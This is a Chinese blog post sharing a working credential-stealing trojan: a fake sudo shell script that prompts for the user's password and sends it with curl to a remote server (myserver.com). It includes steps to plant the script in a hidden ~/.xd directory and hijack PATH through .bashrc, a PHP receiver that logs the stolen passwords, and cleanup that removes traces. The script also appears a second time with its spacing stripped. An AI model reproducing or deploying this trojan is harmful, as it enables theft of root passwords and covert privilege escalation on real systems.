窃取linux root密码,[后门艺术]sudo下窃取root密码 | 独木の白帆

最新推荐文章于 2023-03-09 17:16:59 发布
最新推荐文章于 2023-03-09 17:16:59 发布
阅读量513 收藏 1
点赞数
文章标签: 窃取linux root密码

前几天在GitHub上看到一大牛的sudo下窃取root用户密码的shell脚本,测试了下还非常管用。真可谓是居家旅行,杀人放火的必备工具啊,所以不敢私藏,在此分享给所有渗透狗~_~

废话就不说了,直接上脚本:

Shell

#!/bin/bash

/usr/bin/sudo -k

i=0

while [ $i != 3 ]; do

echo -n "[siii] password for $(whoami): "

read -s xd

echo

echo -e "$xd\n"| /usr/bin/sudo -S true 2>/dev/null

if /usr/bin/sudo -n true 2>/dev/null; then

break

else

echo "Sorry, try again."

fi

unset xd

let i=$i+1

done

if ! /usr/bin/sudo -n true 2>/dev/null; then

echo "sudo: 3 incorrect password attempts"

exit 1

fi

sed -i "/\.xd/d" ~/.bashrc

export PATH=$(echo $PATH| cut -d: -f2-)

echo -e "$xd\n" | /usr/bin/sudo -S "$@"

if [ "$(ping myserver.com -c1 2>/dev/null)" ]; then

curl -s myserver.com/example.php?user=$(whoami)\&pass=$xd 2>/dev/null

sleep 2 && ln -f -s /usr/bin/sudo ~/.xd/sudo &

rm $0

fi

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

#!/bin/bash

/usr/bin/sudo-k

i=0

while[$i!=3];do

echo-n"[siii] password for $(whoami): "

read-sxd

echo

echo-e"$xd\n"|/usr/bin/sudo-Strue2>/dev/null

if/usr/bin/sudo-ntrue2>/dev/null;then

break

else

echo"Sorry, try again."

fi

unsetxd

leti=$i+1

done

if!/usr/bin/sudo-ntrue2>/dev/null;then

echo"sudo: 3 incorrect password attempts"

exit1

fi

sed-i"/\.xd/d"~/.bashrc

exportPATH=$(echo$PATH|cut-d:-f2-)

echo-e"$xd\n"|/usr/bin/sudo-S"$@"

if["$(ping myserver.com -c1 2>/dev/null)"];then

curl-smyserver.com/example.php?user=$(whoami)\&pass=$xd2>/dev/null

sleep2&&ln-f-s/usr/bin/sudo~/.xd/sudo&

rm$0

fi

使用之前,需要在目标机子上做点小改动(当然,需要有一般用户权限):

Step1: 在目标系统上新建一个隐藏的目录:

mkdir ~/.xd

1

2

mkdir~/.xd

Step2: 在目标系统经常登录的用户的bashrc文件中添加环境变量:

echo "export PATH=~/.xd:\$PATH" >> ~/.bashrc

1

2

echo"export PATH=~/.xd:\$PATH">>~/.bashrc

Step3: 将github上的这个sudo脚本放到刚建立的隐藏目录下面,并给于执行权限:

chmod +x ~/.xd/sudo

1

chmod+x~/.xd/sudo

Step4: 根据脚本最后几行可知,该脚本会将获取到的root密码通过HTTP的GET方式发送到远程服务器上,所以写个简单的接收账户密码的php文件:

PHP

$user = $_GET['user'];

$pass = $_GET['pass'];

$f = fopen('./users_log.txt','a+');

fwrite($f, $user);

fwrite($f, "&");

fwrite($f, $pass);

fwrite($f, "\n");

fclose($f);

?>

1

2

3

4

5

6

7

8

9

10

11

12

13

$user=$_GET['user'];

$pass=$_GET['pass'];

$f=fopen('./users_log.txt','a+');

fwrite($f,$user);

fwrite($f,"&");

fwrite($f,$pass);

fwrite($f,"\n");

fclose($f);

?>

下面是我做的一个简单测试:

7447776259d9b6f8403bb6fc8fae294a.png

注意,在使用系统的sudo时上面的提示是“[sudo]”而不是“[siii]”,这里只是为了方便演示而已。下面的是在远程服务器上接收到的账户:

bce8430ec6513878ca37b7c9e25dbc33.png

这个脚本还算是比较“聪明”的,在获取到root密码之后会删掉之前添加到bashrc中的环境变量,并且删除自身。正如作者所认为的,这只是个POC,聪明的人肯定会想到,在拿到root权限之后可以远程下载执行指令等等。。。这个,还是留着大伙儿回去边撸边思考吧。我只是大自然的搬运工!

weixin_39695374
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Linux下mysql的root密码修改方法
09-09
Linux环境下,MySQL数据库系统的root用户的密码遗忘是常见的问题,但解决起来并不复杂。本文将详细介绍如何在Linux系统中修改MySQL的root密码,主要适用于Ubuntu 16.04 LTS (Xenial Xerus)环境,但其他版本的Linux...
Linux下修改和重置root密码的方法(超简单)
09-15
本文将详细介绍如何在Linux下修改和重置root密码,以及如何常规地更新密码。 1. **重置root密码**: 当忘记root密码时,可以通过以下步骤进行重置: - **启动到GRUB引导加载器**:在计算机启动时,当GRUB界面...
Linux C编写***程序盗取root用户密码
weixin_33798152的博客
08-06 183
Linux操作系统中,有很多提权(由普通用户提升权限为root)的方法,大多是利用系统内核的漏洞溢出提权,当然可以和windows一样利用***程序盗取管理员root密码。以下一个是利用伪装成ssh命令的***程序,另一种是利用伪装成su命令的***程序分别盗取管理员root密码。以下是我自己写的ssh***程序和su***程序演示的效果,仅供参考。实验环境: 操作系统:RHEL 5.9 ...
linux su命令 密码窃取,Linux C编写木马程序盗取root用户密码
weixin_35587255的博客
04-29 322
Linux操作系统中,有很多提权(由普通用户提升权限为root)的方法,大多是利用系统内核的漏洞溢出提权,当然可以和windows一样利用木马程序盗取管理员root密码。以下一个是利用伪装成ssh命令的木马程序,另一种是利用伪装成su命令的木马程序分别盗取管理员root密码。以下是我自己写的ssh木马程序和su木马程序演示的效果,仅供参考。实验环境:操作系统:RHEL 5.9超户:root ...
Linux下如何修改root密码以及找回root密码
weixin_34356138的博客
07-05 644
Linux下修改root密码方法 以root身份登陆,执行: passwd 用户名 然后根据提示,输入新密码,再次输入新密码,系统会提示成功修改密码。 具体示例如下: [root@www ~]# passwd root Changing password for user root. New UNIX password: BAD PASSWORD: it is based on...
linux下修改root密码以及找回密码的方法
十方地藏
12-14 771
root身份登陆,执行:   # passwd 用户名 (修改密码)   # useradd 用户名 (添加用户)   具体示例如下:[root@bogon ~]# passwd root   Changing password for user root.   New UNIX password:   BAD PASSWORD: it is based on a dictionar
Linuxroot初始密码设置方法
09-15
本文将详细解释如何在Linux环境下为root用户设置初始密码。 首先,你需要以安装Ubuntu时输入的用户名登录。这个用户通常属于admin组,因此具备为root用户设置密码的权限。打开终端(Terminal)窗口,你可以通过以下...
Linux忘记root密码及设置root密码的图文操作方法
09-15
本文将详细介绍如何在Linux环境下,当忘记root密码时,通过进入单用户模式来重置密码,并提供一般性的root密码设置方法。 **一、进入单用户模式** 1. **重启计算机**:首先,需要重启你的Linux系统,当系统启动至...
linux找回root密码的一种方法
LastYHM的博客
09-09 162
1)重启Linux,见到下图,通过键盘上下方向键选择第一个 2)按e,出现如图5-9所示的界面 3)定位到LANG=zh_CN.UTF-8,后面追加 init=/bin/sh, 如图5-10所示 4)键盘ctrl+x进行引导启动,进入如下界面,如图5-11所示 4) 挂载根目录 ,如图5-12 6) 选择要修改密码的用户名,passwd root, 然后输入两次一致的密码,依次回车。 注意: 输入密码不显示,一定要确认输入正确. 7) 更新系统信息 touch /.autorelabel ,如图
MySQL 8.0.19支持输入3次错误密码锁定账户功能(例子)
12-15
MySQL 8.0.19支持输入3次错误密码,锁定账户功能 例子: >CREATE USER 'hechunyang'@'localhost' IDENTIFIED BY '123456' FAILED_LOGIN_ATTEMPTS 3 PASSWORD_LOCK_TIME 3; FAILED_LOGIN_ATTEMPTS:代表尝试失败的次数 PASSWORD_LOCK_TIME:代表锁定的时间,单位天,这里为锁定3天。                                           如果设置UNBOUNDED,代表锁定永久,直到手工解锁。 故意输错3次以上密码,账户被锁
php执行 修改root密码,linux系统下如何修改root密码
weixin_29189377的博客
03-21 171
Linux修改root密码的方法有:1、当用户具有sudo权限时就可以直接修改密码;2、当不具有权限时,可以长按Shift键进入GRUB导图模式里的Ubuntu高级选项,进行配置。【推荐课程:Linux教程】Linux修改root密码的方法有:第一种:当前用户具有sudo权限当用户具有sudo权限,就可以直接修改密码,方法如下:sudo su root#passwd使用命令:sudo passwd...
破解root密码
m0_62615760的博客
04-24 717
跟之前使用的破解方法不一样,记录下 1.选择内核文件 2.输入rd.break,ctrl+x保存 3./sysroot挂载权限不足,重新以读写的方式挂载,将根目录切换到/sysroot,执行passwd命令重置密码 4.如果selinux是开启状态,我们需要新建.autorelabel这个隐藏文件,让selinux开机时重新写入文件的安全上下文,防止出现问题 ...
特殊的php上传漏洞再到获取linux root最后栽下rootkit
weixin_34205076的博客
11-17 889
文章作者:sunwear 信息来源:邪恶八进制信息安全团队(www.eviloctal.com) 特殊的php上传漏洞再到获取linuxroot最后栽下rootkit 本文已发表在《黑客手册》2009年第9期杂志上 Author: sunwear [E.S.T] QQ:47347 Email:47347@qq.comhttp://hi.baidu...
OpenSSH后门获取root密码及防范
weixin_30340745的博客
03-15 540
OpenSSH后门获取root密码及防范 相对于Windows操作系统,Linux操作系统的密码较难获取。而很多Linux服务器都配置了Openssh服务,在获取root权限的情况下,可以通过修改或者更新OpenSSH代码等方法,截取并保存其SSH登录账号密码,甚至可以留一个隐形的后门,达到长期控制linux服务器的目的。在很多Linux系统被入侵后都会在系统中留后门,使用OpenSS...
ubuntu 虚拟终端登录 incorrect 无法输入密码
最新发布
zhtxcs的博客
03-09 9888
ubuntu 虚拟终端登录 incorrect 无法输入密码
linux输入密码后提示密码错误,用sudo命令没有提示输入密码,而是出现sudo:3次错误密码尝试的解决...
weixin_28936649的博客
04-29 1万+
比如在Deepin系统中输入sudo apt update、sudo ls等命令,这时并没有提示输入密码,而是出现了对不起,请重试,然后会出现sudo: 3次错误密码尝试。即它是直接提示失败的,而且连着失败3次,已排除是回车键粘连的可能,因为经过了打开文档编辑器测试,并没有按键粘连问题。原因和解决方案1、可以试试以下方案:echo "your password" | sudo -S xxxxxxx...
[Linux] 远程 SSH 两级跳转用户sodu的问题--sudo: no tty present and no askpass program specified
csdn's blog
06-19 1万+
业务场景描述: 我有100多组mysql db服务器,那么其中10台我需要建一个mysql用户下的文件,如果按照正常流程来看,我需要在跳转控制机dbcrol上面 ssh 到mysql 服务器上面,但是sudo进去的可不是mysql帐号,而是一个novaadmin帐号,我还需要执行sudo su - mysql命令跳转进入mysql用户模式下,才能执行mkdir -p /mysqlog/slow...
sudo命令的使用
热门推荐
m0_37695902的博客
09-28 1万+
linux系统中,有些普通用户需要借助root帐号来执行一些操作,但我们并不能把root密码给普通用户,就有了sudosudo可以临时切换到指定帐号进行操作使用方法:  sudo [ -u 用户帐号] 需要执行的命令;切换到root时,可以直接执行sudo 执行命令 即可;  sudo -l :列出所有可以执行的命令使用条件:  必须以root身份执行visudo,添加需要执行sudo命令的用户;&n...
Linuxsudoroot权限详解:用法差异与安全实践
Linux操作系统中,rootsudo是两个核心概念,对于系统管理和安全性至关重要。root是超级用户账户,具有系统内无可匹敌的权限,可以对系统进行深度操作,包括修改核心组件、升级系统、配置和管理服务等。root用户...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值